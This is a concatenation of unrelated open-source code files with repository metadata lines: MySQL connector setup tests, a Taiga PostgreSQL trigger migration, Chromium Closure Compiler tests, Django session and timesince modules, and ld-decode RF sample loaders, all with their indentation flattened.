# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
from parser import parse
from strings import *
import os.path
#inspired by code from python cookbook
def ensure_relative_path_exists(newdir):
if os.path.isdir(newdir):
pass
elif os.path.isfile(newdir):
raise OSError("a file with the same name as the desired " \
"dir, '%s', already exists." % newdir)
else:
head, tail = os.path.split(newdir)
print "Head, Tail: %s, %s" % (head, tail)
if head and not os.path.isdir(head):
ensure_relative_path_exists(head)
if tail:
os.mkdir(newdir)
| agpl-3.0 |
rupace10/mysql-connector-python | tests/test_setup.py | 12 | 5048 | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2013, 2014, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unit tests for the setup script of Connector/Python
"""
import sys
import tests
import imp
import setupinfo
class VersionTests(tests.MySQLConnectorTests):
"""Testing the version of Connector/Python"""
def test_version(self):
"""Test validity of version"""
vs = setupinfo.VERSION
self.assertTrue(all(
[isinstance(vs[0], int),
isinstance(vs[1], int),
isinstance(vs[2], int),
isinstance(vs[3], str),
isinstance(vs[4], int)]))
def test___version__(self):
"""Test module __version__ and __version_info__"""
import mysql.connector
self.assertTrue(hasattr(mysql.connector, '__version__'))
self.assertTrue(hasattr(mysql.connector, '__version_info__'))
self.assertTrue(isinstance(mysql.connector.__version__, str))
self.assertTrue(isinstance(mysql.connector.__version_info__, tuple))
self.assertEqual(setupinfo.VERSION_TEXT, mysql.connector.__version__)
self.assertEqual(setupinfo.VERSION, mysql.connector.__version_info__)
class SetupInfoTests(tests.MySQLConnectorTests):
"""Testing meta setup information
We are importing the setupinfo module insite the unit tests
to be able to actually do tests.
"""
def setUp(self):
# we temper with version_info, play safe, keep copy
self._sys_version_info = sys.version_info
def tearDown(self):
# we temper with version_info, play safe, restore copy
sys.version_info = self._sys_version_info
def test_name(self):
"""Test the name of Connector/Python"""
import setupinfo
self.assertEqual('mysql-connector-python', setupinfo.name)
def test_dev_statuses(self):
"""Test the development statuses"""
import setupinfo
exp = {
'a': '3 - Alpha',
'b': '4 - Beta',
'rc': '4 - Beta',
'': '5 - Production/Stable'
}
self.assertEqual(exp, setupinfo.DEVELOPMENT_STATUSES)
def test_package_dir(self):
"""Test the package directory"""
import setupinfo
exp = {
'': 'lib',
}
self.assertEqual(exp, setupinfo.package_dir)
def test_unsupported_python(self):
"""Test if old Python version are unsupported"""
import setupinfo
tmp = sys.version_info
sys.version_info = (3, 0, 0, 'final', 0)
try:
imp.reload(setupinfo)
except RuntimeError:
pass
else:
self.fail("RuntimeError not raised with unsupported Python")
sys.version_info = tmp
def test_version(self):
"""Test the imported version information"""
import setupinfo
ver = setupinfo.VERSION
exp = '{0}.{1}.{2}'.format(*ver[0:3])
self.assertEqual(exp, setupinfo.version)
def test_misc_meta(self):
"""Test miscellaneous data such as URLs"""
import setupinfo
self.assertEqual(
'http://dev.mysql.com/doc/connector-python/en/index.html',
setupinfo.url)
self.assertEqual(
'http://dev.mysql.com/downloads/connector/python/',
setupinfo.download_url)
def test_classifiers(self):
"""Test Trove classifiers"""
import setupinfo
for clsfr in setupinfo.classifiers:
if 'Programming Language :: Python' in clsfr:
ver = clsfr.replace('Programming Language :: Python :: ', '')
if ver not in ('2.6', '2.7', '3', '3.1', '3.2', '3.3'):
self.fail('Unsupported version in classifiers')
if 'Development Status ::' in clsfr:
status = clsfr.replace('Development Status :: ', '')
self.assertEqual(
setupinfo.DEVELOPMENT_STATUSES[setupinfo.VERSION[3]],
status)
| gpl-2.0 |
mattcongy/itshop | docker-images/taigav2/taiga-back/taiga/projects/custom_attributes/migrations/0003_triggers_on_delete_customattribute.py | 28 | 4785 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('custom_attributes', '0002_issuecustomattributesvalues_taskcustomattributesvalues_userstorycustomattributesvalues'),
]
operations = [
# Function: Remove a key in a json field
migrations.RunSQL(
"""
CREATE OR REPLACE FUNCTION "json_object_delete_keys"("json" json, VARIADIC "keys_to_delete" text[])
RETURNS json
LANGUAGE sql
IMMUTABLE
STRICT
AS $function$
SELECT COALESCE ((SELECT ('{' || string_agg(to_json("key") || ':' || "value", ',') || '}')
FROM json_each("json")
WHERE "key" <> ALL ("keys_to_delete")),
'{}')::json $function$;
""",
reverse_sql="""DROP FUNCTION IF EXISTS "json_object_delete_keys"("json" json, VARIADIC "keys_to_delete" text[])
CASCADE;"""
),
# Function: Romeve a key in the json field of *_custom_attributes_values.values
migrations.RunSQL(
"""
CREATE OR REPLACE FUNCTION "clean_key_in_custom_attributes_values"()
RETURNS trigger
AS $clean_key_in_custom_attributes_values$
DECLARE
key text;
tablename text;
BEGIN
key := OLD.id::text;
tablename := TG_ARGV[0]::text;
EXECUTE 'UPDATE ' || quote_ident(tablename) || '
SET attributes_values = json_object_delete_keys(attributes_values, ' ||
quote_literal(key) || ')';
RETURN NULL;
END; $clean_key_in_custom_attributes_values$
LANGUAGE plpgsql;
""",
reverse_sql="""DROP FUNCTION IF EXISTS "clean_key_in_custom_attributes_values"()
CASCADE;"""
),
# Trigger: Clean userstorycustomattributes values before remove a userstorycustomattribute
migrations.RunSQL(
"""
CREATE TRIGGER "update_userstorycustomvalues_after_remove_userstorycustomattribute"
AFTER DELETE ON custom_attributes_userstorycustomattribute
FOR EACH ROW
EXECUTE PROCEDURE clean_key_in_custom_attributes_values('custom_attributes_userstorycustomattributesvalues');
""",
reverse_sql="""DROP TRIGGER IF EXISTS "update_userstorycustomvalues_after_remove_userstorycustomattribute"
ON custom_attributes_userstorycustomattribute
CASCADE;"""
),
# Trigger: Clean taskcustomattributes values before remove a taskcustomattribute
migrations.RunSQL(
"""
CREATE TRIGGER "update_taskcustomvalues_after_remove_taskcustomattribute"
AFTER DELETE ON custom_attributes_taskcustomattribute
FOR EACH ROW
EXECUTE PROCEDURE clean_key_in_custom_attributes_values('custom_attributes_taskcustomattributesvalues');
""",
reverse_sql="""DROP TRIGGER IF EXISTS "update_taskcustomvalues_after_remove_taskcustomattribute"
ON custom_attributes_taskcustomattribute
CASCADE;"""
),
# Trigger: Clean issuecustomattributes values before remove a issuecustomattribute
migrations.RunSQL(
"""
CREATE TRIGGER "update_issuecustomvalues_after_remove_issuecustomattribute"
AFTER DELETE ON custom_attributes_issuecustomattribute
FOR EACH ROW
EXECUTE PROCEDURE clean_key_in_custom_attributes_values('custom_attributes_issuecustomattributesvalues');
""",
reverse_sql="""DROP TRIGGER IF EXISTS "update_issuecustomvalues_after_remove_issuecustomattribute"
ON custom_attributes_issuecustomattribute
CASCADE;"""
)
]
| mit |
danakj/chromium | third_party/closure_compiler/compiler_test.py | 6 | 11550 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from ast import literal_eval
import os
import tempfile
import unittest
from compile import Checker
from processor import FileCache, Processor
_SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
_SRC_DIR = os.path.join(_SCRIPT_DIR, os.pardir, os.pardir)
_RESOURCES_DIR = os.path.join(_SRC_DIR, "ui", "webui", "resources", "js")
_ASSERT_JS = os.path.join(_RESOURCES_DIR, "assert.js")
_CR_JS = os.path.join(_RESOURCES_DIR, "cr.js")
_CR_UI_JS = os.path.join(_RESOURCES_DIR, "cr", "ui.js")
_PROMISE_RESOLVER_JS = os.path.join(_RESOURCES_DIR, "promise_resolver.js")
_POLYMER_EXTERNS = os.path.join(_SCRIPT_DIR, "externs", "polymer-1.0.js")
_CHROME_SEND_EXTERNS = os.path.join(_SRC_DIR, "third_party", "closure_compiler",
"externs", "chrome_send.js")
_CLOSURE_ARGS_GYPI = os.path.join(_SCRIPT_DIR, "closure_args.gypi")
_GYPI_DICT = literal_eval(open(_CLOSURE_ARGS_GYPI).read())
_COMMON_CLOSURE_ARGS = _GYPI_DICT["default_closure_args"] + \
_GYPI_DICT["default_disabled_closure_args"]
_RUNNER_ARGS = ["enable-chrome-pass"]
class CompilerTest(unittest.TestCase):
_ASSERT_DEFINITION = Processor(_ASSERT_JS).contents
_PROMISE_RESOLVER_DEFINITION = (_ASSERT_DEFINITION +
Processor(_PROMISE_RESOLVER_JS).contents)
_CR_DEFINE_DEFINITION = (_PROMISE_RESOLVER_DEFINITION +
Processor(_CR_JS).contents)
_CR_UI_DECORATE_DEFINITION = Processor(_CR_UI_JS).contents
def setUp(self):
self._checker = Checker()
self._tmp_files = []
def tearDown(self):
for file in self._tmp_files:
if os.path.exists(file):
os.remove(file)
def _runChecker(self, source_code, closure_args=None):
file_path = "/script.js"
FileCache._cache[file_path] = source_code
out_file, out_map = self._createOutFiles()
args = _COMMON_CLOSURE_ARGS + (closure_args or [])
externs = [_POLYMER_EXTERNS, _CHROME_SEND_EXTERNS]
found_errors, stderr = self._checker.check(file_path,
externs=externs,
out_file=out_file,
runner_args=_RUNNER_ARGS,
closure_args=args)
return found_errors, stderr, out_file, out_map
def _runCheckerTestExpectError(self, source_code, expected_error,
closure_args=None):
_, stderr, out_file, out_map = self._runChecker(source_code, closure_args)
self.assertTrue(expected_error in stderr,
msg="Expected chunk: \n%s\n\nOutput:\n%s\n" % (
expected_error, stderr))
self.assertFalse(os.path.exists(out_file))
self.assertFalse(os.path.exists(out_map))
def _runCheckerTestExpectSuccess(self, source_code, expected_output=None,
closure_args=None):
found_errors, stderr, out_file, out_map = self._runChecker(source_code,
closure_args)
self.assertFalse(found_errors,
msg="Expected success, but got failure\n\nOutput:\n%s\n" % stderr)
self.assertTrue(os.path.exists(out_map))
self.assertTrue(os.path.exists(out_file))
if expected_output:
with open(out_file, "r") as file:
self.assertEquals(file.read(), expected_output)
def _createOutFiles(self):
out_file = tempfile.NamedTemporaryFile(delete=False)
out_map = "%s.map" % out_file.name
self._tmp_files.append(out_file.name)
self._tmp_files.append(out_map)
return out_file.name, out_map
def testGetInstance(self):
self._runCheckerTestExpectError("""
var cr = {
/** @param {!Function} ctor */
addSingletonGetter: function(ctor) {
ctor.getInstance = function() {
return ctor.instance_ || (ctor.instance_ = new ctor());
};
}
};
/** @constructor */
function Class() {
/** @param {number} num */
this.needsNumber = function(num) {};
}
cr.addSingletonGetter(Class);
Class.getInstance().needsNumber("wrong type");
""", "ERROR - actual parameter 1 of Class.needsNumber does not match formal "
"parameter")
def testCrDefineFunctionDefinition(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @param {number} num */
function internalName(num) {}
return {
needsNumber: internalName
};
});
a.b.c.needsNumber("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.needsNumber does not match formal "
"parameter")
def testCrDefineFunctionAssignment(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @param {number} num */
var internalName = function(num) {};
return {
needsNumber: internalName
};
});
a.b.c.needsNumber("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.needsNumber does not match formal "
"parameter")
def testCrDefineConstructorDefinitionPrototypeMethod(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @constructor */
function ClassInternalName() {}
ClassInternalName.prototype = {
/** @param {number} num */
method: function(num) {}
};
return {
ClassExternalName: ClassInternalName
};
});
new a.b.c.ClassExternalName().method("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.ClassExternalName.prototype.method "
"does not match formal parameter")
def testCrDefineConstructorAssignmentPrototypeMethod(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @constructor */
var ClassInternalName = function() {};
ClassInternalName.prototype = {
/** @param {number} num */
method: function(num) {}
};
return {
ClassExternalName: ClassInternalName
};
});
new a.b.c.ClassExternalName().method("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.ClassExternalName.prototype.method "
"does not match formal parameter")
def testCrDefineEnum(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @enum {string} */
var internalNameForEnum = {key: 'wrong_type'};
return {
exportedEnum: internalNameForEnum
};
});
/** @param {number} num */
function needsNumber(num) {}
needsNumber(a.b.c.exportedEnum.key);
""", "ERROR - actual parameter 1 of needsNumber does not match formal "
"parameter")
def testObjectDefineProperty(self):
self._runCheckerTestExpectSuccess("""
/** @constructor */
function Class() {}
Object.defineProperty(Class.prototype, 'myProperty', {});
alert(new Class().myProperty);
""")
def testCrDefineProperty(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION + """
/** @constructor */
function Class() {}
cr.defineProperty(Class.prototype, 'myProperty', cr.PropertyKind.JS);
alert(new Class().myProperty);
""")
def testCrDefinePropertyTypeChecking(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
/** @constructor */
function Class() {}
cr.defineProperty(Class.prototype, 'booleanProp', cr.PropertyKind.BOOL_ATTR);
/** @param {number} num */
function needsNumber(num) {}
needsNumber(new Class().booleanProp);
""", "ERROR - actual parameter 1 of needsNumber does not match formal "
"parameter")
def testCrDefineOnCrWorks(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION + """
cr.define('cr', function() {
return {};
});
""")
def testAssertWorks(self):
self._runCheckerTestExpectSuccess(self._ASSERT_DEFINITION + """
/** @return {?string} */
function f() {
return "string";
}
/** @type {!string} */
var a = assert(f());
""")
def testAssertInstanceofWorks(self):
self._runCheckerTestExpectSuccess(self._ASSERT_DEFINITION + """
/** @constructor */
function Class() {}
/** @return {Class} */
function f() {
var a = document.createElement('div');
return assertInstanceof(a, Class);
}
""")
def testCrUiDecorateWorks(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION +
self._CR_UI_DECORATE_DEFINITION + """
/** @constructor */
function Class() {}
/** @return {Class} */
function f() {
var a = document.createElement('div');
cr.ui.decorate(a, Class);
return a;
}
""")
def testValidScriptCompilation(self):
self._runCheckerTestExpectSuccess("""
var testScript = function() {
console.log("hello world")
};
""",
"""'use strict';var testScript=function(){console.log("hello world")};\n""")
def testOutputWrapper(self):
source_code = """
var testScript = function() {
console.log("hello world");
};
"""
expected_output = ("""(function(){'use strict';var testScript=function()"""
"""{console.log("hello world")};})();\n""")
closure_args=["output_wrapper='(function(){%output%})();'"]
self._runCheckerTestExpectSuccess(source_code, expected_output,
closure_args)
def testCheckMultiple(self):
source_file1 = tempfile.NamedTemporaryFile(delete=False)
with open(source_file1.name, "w") as f:
f.write("""
goog.provide('testScript');
var testScript = function() {};
""")
self._tmp_files.append(source_file1.name)
source_file2 = tempfile.NamedTemporaryFile(delete=False)
with open(source_file2.name, "w") as f:
f.write("""
goog.require('testScript');
testScript();
""")
self._tmp_files.append(source_file2.name)
out_file, out_map = self._createOutFiles()
sources = [source_file1.name, source_file2.name]
externs = [_POLYMER_EXTERNS]
found_errors, stderr = self._checker.check_multiple(
sources, externs=externs, out_file=out_file,
closure_args=_COMMON_CLOSURE_ARGS)
self.assertFalse(found_errors,
msg="Expected success, but got failure\n\nOutput:\n%s\n" % stderr)
expected_output = "'use strict';var testScript=function(){};testScript();\n"
self.assertTrue(os.path.exists(out_map))
self.assertTrue(os.path.exists(out_file))
with open(out_file, "r") as file:
self.assertEquals(file.read(), expected_output)
def testExportPath(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION +
"cr.exportPath('a.b.c');");
def testExportPathWithTargets(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION +
"var path = 'a.b.c'; cr.exportPath(path, {}, {});")
def testExportPathNoPath(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION +
"cr.exportPath();",
"ERROR - cr.exportPath() should have at least 1 argument: path name")
def testMissingReturnAssertNotReached(self):
template = self._ASSERT_DEFINITION + """
/** @enum {number} */
var Enum = {FOO: 1, BAR: 2};
/**
* @param {Enum} e
* @return {number}
*/
function enumToVal(e) {
switch (e) {
case Enum.FOO:
return 1;
case Enum.BAR:
return 2;
}
%s
}
"""
args = ['warning_level=VERBOSE']
self._runCheckerTestExpectError(template % '', 'Missing return',
closure_args=args)
self._runCheckerTestExpectSuccess(template % 'assertNotReached();',
closure_args=args)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
gfneto/bitcoin-abe | build/lib.linux-x86_64-2.7/Abe/Chain/Bitcoin.py | 29 | 1035 | # Copyright(C) 2014 by Abe developers.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/agpl.html>.
from .Sha256Chain import Sha256Chain
class Bitcoin(Sha256Chain):
def __init__(chain, **kwargs):
chain.name = 'Bitcoin'
chain.code3 = 'BTC'
chain.address_version = '\x00'
chain.script_addr_vers = '\x05'
chain.magic = '\xf9\xbe\xb4\xd9'
Sha256Chain.__init__(chain, **kwargs)
| agpl-3.0 |
ccastell/Transfer-System | Website/env/lib/python3.5/site-packages/django/contrib/sessions/middleware.py | 129 | 3423 | import time
from importlib import import_module
from django.conf import settings
from django.contrib.sessions.backends.base import UpdateError
from django.core.exceptions import SuspiciousOperation
from django.utils.cache import patch_vary_headers
from django.utils.deprecation import MiddlewareMixin
from django.utils.http import cookie_date
class SessionMiddleware(MiddlewareMixin):
def __init__(self, get_response=None):
self.get_response = get_response
engine = import_module(settings.SESSION_ENGINE)
self.SessionStore = engine.SessionStore
def process_request(self, request):
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME)
request.session = self.SessionStore(session_key)
def process_response(self, request, response):
"""
If request.session was modified, or if the configuration is to save the
session every time, save the changes and set a session cookie or delete
the session cookie if the session has been emptied.
"""
try:
accessed = request.session.accessed
modified = request.session.modified
empty = request.session.is_empty()
except AttributeError:
pass
else:
# First check if we need to delete this cookie.
# The session should be deleted only if the session is entirely empty
if settings.SESSION_COOKIE_NAME in request.COOKIES and empty:
response.delete_cookie(
settings.SESSION_COOKIE_NAME,
path=settings.SESSION_COOKIE_PATH,
domain=settings.SESSION_COOKIE_DOMAIN,
)
else:
if accessed:
patch_vary_headers(response, ('Cookie',))
if (modified or settings.SESSION_SAVE_EVERY_REQUEST) and not empty:
if request.session.get_expire_at_browser_close():
max_age = None
expires = None
else:
max_age = request.session.get_expiry_age()
expires_time = time.time() + max_age
expires = cookie_date(expires_time)
# Save the session data and refresh the client cookie.
# Skip session save for 500 responses, refs #3881.
if response.status_code != 500:
try:
request.session.save()
except UpdateError:
raise SuspiciousOperation(
"The request's session was deleted before the "
"request completed. The user may have logged "
"out in a concurrent request, for example."
)
response.set_cookie(
settings.SESSION_COOKIE_NAME,
request.session.session_key, max_age=max_age,
expires=expires, domain=settings.SESSION_COOKIE_DOMAIN,
path=settings.SESSION_COOKIE_PATH,
secure=settings.SESSION_COOKIE_SECURE or None,
httponly=settings.SESSION_COOKIE_HTTPONLY or None,
)
return response
| apache-2.0 |
pk400/catering | myvenv/lib/python3.4/site-packages/django/utils/timesince.py | 409 | 2671 | from __future__ import unicode_literals
import calendar
import datetime
from django.utils.html import avoid_wrapping
from django.utils.timezone import is_aware, utc
from django.utils.translation import ugettext, ungettext_lazy
TIMESINCE_CHUNKS = (
(60 * 60 * 24 * 365, ungettext_lazy('%d year', '%d years')),
(60 * 60 * 24 * 30, ungettext_lazy('%d month', '%d months')),
(60 * 60 * 24 * 7, ungettext_lazy('%d week', '%d weeks')),
(60 * 60 * 24, ungettext_lazy('%d day', '%d days')),
(60 * 60, ungettext_lazy('%d hour', '%d hours')),
(60, ungettext_lazy('%d minute', '%d minutes'))
)
def timesince(d, now=None, reversed=False):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from
http://web.archive.org/web/20060617175230/http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
now = datetime.datetime.now(utc if is_aware(d) else None)
delta = (d - now) if reversed else (now - d)
# Deal with leapyears by subtracing the number of leapdays
delta -= datetime.timedelta(calendar.leapdays(d.year, now.year))
# ignore microseconds
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return avoid_wrapping(ugettext('0 minutes'))
for i, (seconds, name) in enumerate(TIMESINCE_CHUNKS):
count = since // seconds
if count != 0:
break
result = avoid_wrapping(name % count)
if i + 1 < len(TIMESINCE_CHUNKS):
# Now get the second item
seconds2, name2 = TIMESINCE_CHUNKS[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
result += ugettext(', ') + avoid_wrapping(name2 % count2)
return result
def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
return timesince(d, now, reversed=True)
| mit |
happycube/ld-decode | lddecode/utils.py | 1 | 29033 | # A collection of helper functions used in dev notebooks and lddecode_core.py
import atexit
from base64 import b64encode
from collections import namedtuple
import copy
import getopt
import io
from io import BytesIO
import json
import math
import os
import sys
import subprocess
from multiprocessing import Process, Pool, Queue, JoinableQueue, Pipe
import threading
import queue
from numba import jit, njit
# standard numeric/scientific libraries
import numpy as np
import scipy as sp
import scipy.signal as sps
from scipy import interpolate
# This runs a cubic scaler on a line.
# originally from https://www.paulinternet.nl/?page=bicubic
@njit(nogil=True)
def scale(buf, begin, end, tgtlen, mult=1):
linelen = end - begin
sfactor = linelen / tgtlen
output = np.zeros(tgtlen, dtype=buf.dtype)
for i in range(0, tgtlen):
coord = (i * sfactor) + begin
start = int(coord) - 1
p = buf[start : start + 4]
x = coord - int(coord)
output[i] = mult * (
p[1]
+ 0.5
* x
* (
p[2]
- p[0]
+ x
* (
2.0 * p[0]
- 5.0 * p[1]
+ 4.0 * p[2]
- p[3]
+ x * (3.0 * (p[1] - p[2]) + p[3] - p[0])
)
)
)
return output
frequency_suffixes = [
("ghz", 1.0e9),
("mhz", 1.0e6),
("khz", 1.0e3),
("hz", 1.0),
("fsc", 315.0e6 / 88.0),
("fscpal", (283.75 * 15625) + 25),
]
def parse_frequency(string):
"""Parse an argument string, returning a float frequency in MHz."""
multiplier = 1.0e6
for suffix, mult in frequency_suffixes:
if string.lower().endswith(suffix):
multiplier = mult
string = string[: -len(suffix)]
break
return (multiplier * float(string)) / 1.0e6
"""
For this part of the loader phase I found myself going to function objects that implement this sample API:
```
infile: standard readable/seekable python binary file
sample: starting sample #
readlen: # of samples
```
Returns data if successful, or None or an upstream exception if not (including if not enough data is available)
"""
def make_loader(filename, inputfreq=None):
"""Return an appropriate loader function object for filename.
If inputfreq is specified, it gives the sample rate in MHz of the source
file, and the loader will resample from that rate to 40 MHz. Any sample
rate specified by the source file's metadata will be ignored, as some
formats can't represent typical RF sample rates accurately."""
if inputfreq is not None:
# We're resampling, so we have to use ffmpeg.
if filename.endswith(".r16") or filename.endswith(".s16"):
input_args = ["-f", "s16le"]
elif filename.endswith(".rf"):
input_args = ["-f", "f32le"]
elif filename.endswith(".r8") or filename.endswith(".u8"):
input_args = ["-f", "u8"]
elif filename.endswith(".u16"):
input_args = ["-f", "u16le"]
elif filename.endswith(".lds") or filename.endswith(".r30"):
raise ValueError("File format not supported when resampling: " + filename)
else:
# Assume ffmpeg will recognise this format itself.
input_args = []
# Use asetrate first to override the input file's sample rate.
output_args = [
"-filter:a",
"asetrate=" + str(inputfreq * 1e6) + ",aresample=" + str(40e6),
]
return LoadFFmpeg(input_args=input_args, output_args=output_args)
elif filename.endswith(".lds"):
return load_packed_data_4_40
elif filename.endswith(".r30"):
return load_packed_data_3_32
elif filename.endswith(".rf"):
return load_unpacked_data_float32
elif filename.endswith(".r16") or filename.endswith(".s16"):
return load_unpacked_data_s16
elif filename.endswith(".r16") or filename.endswith(".u16"):
return load_unpacked_data_u16
elif filename.endswith(".r8") or filename.endswith(".u8"):
return load_unpacked_data_u8
elif filename.endswith("raw.oga") or filename.endswith(".ldf"):
try:
rv = LoadLDF(filename)
except:
# print("Please build and install ld-ldf-reader in your PATH for improved performance", file=sys.stderr)
rv = LoadFFmpeg()
return rv
else:
return load_packed_data_4_40
def load_unpacked_data(infile, sample, readlen, sampletype):
# this is run for unpacked data:
# 1 is for 8-bit cxadc data, 2 for 16bit DD, 3 for 16bit cxadc
samplelength = 2 if sampletype == 3 else sampletype
infile.seek(sample * samplelength, 0)
inbuf = infile.read(readlen * samplelength)
if sampletype == 4:
indata = np.fromstring(inbuf, "float32", len(inbuf) // 4) * 32768
elif sampletype == 3:
indata = np.fromstring(inbuf, "uint16", len(inbuf) // 2)
elif sampletype == 2:
indata = np.fromstring(inbuf, "int16", len(inbuf) // 2)
else:
indata = np.fromstring(inbuf, "uint8", len(inbuf))
if len(indata) < readlen:
return None
return indata
def load_unpacked_data_u8(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 1)
def load_unpacked_data_s16(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 2)
def load_unpacked_data_u16(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 3)
def load_unpacked_data_float32(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 4)
# This is for the .r30 format I did in ddpack/unpack.c. Depricated but I still have samples in it.
def load_packed_data_3_32(infile, sample, readlen):
start = (sample // 3) * 4
offset = sample % 3
start, offset
infile.seek(start)
# we need another word in case offset != 0
needed = int(np.ceil(readlen * 3 / 4) * 4) + 4
inbuf = infile.read(needed)
indata = np.fromstring(inbuf, "uint32", len(inbuf) // 4)
if len(indata) < needed:
return None
unpacked = np.zeros(len(indata) * 3, dtype=np.int16)
# By using strides the unpacked data can be loaded with no additional copies
np.bitwise_and(indata, 0x3FF, out=unpacked[0::3])
# hold the shifted bits in it's own array to avoid an allocation
tmp = np.right_shift(indata, 10)
np.bitwise_and(tmp, 0x3FF, out=unpacked[1::3])
np.right_shift(indata, 20, out=tmp)
np.bitwise_and(tmp, 0x3FF, out=unpacked[2::3])
return unpacked[offset : offset + readlen]
# The 10-bit samples from the Duplicator...
"""
From Simon's code:
// Original
// 0: xxxx xx00 0000 0000
// 1: xxxx xx11 1111 1111
// 2: xxxx xx22 2222 2222
// 3: xxxx xx33 3333 3333
//
// Packed:
// 0: 0000 0000 0011 1111
// 2: 1111 2222 2222 2233
// 4: 3333 3333
"""
# The bit twiddling is a bit more complex than I'd like... but eh. I think
# it's debugged now. ;)
def load_packed_data_4_40(infile, sample, readlen):
start = (sample // 4) * 5
offset = sample % 4
seekedto = infile.seek(start)
# we need another word in case offset != 0
needed = int(np.ceil(readlen * 5 // 4)) + 5
inbuf = infile.read(needed)
indata = np.frombuffer(inbuf, "uint8", len(inbuf))
if len(indata) < needed:
return None
rot2 = np.right_shift(indata, 2)
unpacked = np.zeros(readlen + 4, dtype=np.uint16)
# we need to load the 8-bit data into the 16-bit unpacked for left_shift to work
# correctly...
unpacked[0::4] = indata[0::5]
np.left_shift(unpacked[0::4], 2, out=unpacked[0::4])
np.bitwise_or(
unpacked[0::4],
np.bitwise_and(np.right_shift(indata[1::5], 6), 0x03),
out=unpacked[0::4],
)
unpacked[1::4] = np.bitwise_and(indata[1::5], 0x3F)
np.left_shift(unpacked[1::4], 4, out=unpacked[1::4])
np.bitwise_or(
unpacked[1::4],
np.bitwise_and(np.right_shift(indata[2::5], 4), 0x0F),
out=unpacked[1::4],
)
unpacked[2::4] = np.bitwise_and(indata[2::5], 0x0F)
np.left_shift(unpacked[2::4], 6, out=unpacked[2::4])
np.bitwise_or(
unpacked[2::4],
np.bitwise_and(np.right_shift(indata[3::5], 2), 0x3F),
out=unpacked[2::4],
)
unpacked[3::4] = np.bitwise_and(indata[3::5], 0x03)
np.left_shift(unpacked[3::4], 8, out=unpacked[3::4])
np.bitwise_or(unpacked[3::4], indata[4::5], out=unpacked[3::4])
# convert back to original DdD 16-bit format (signed 16-bit, left shifted)
rv_unsigned = unpacked[offset : offset + readlen].copy()
rv_signed = np.left_shift(rv_unsigned.astype(np.int16) - 512, 6)
return rv_signed
class LoadFFmpeg:
"""Load samples from a wide variety of formats using ffmpeg."""
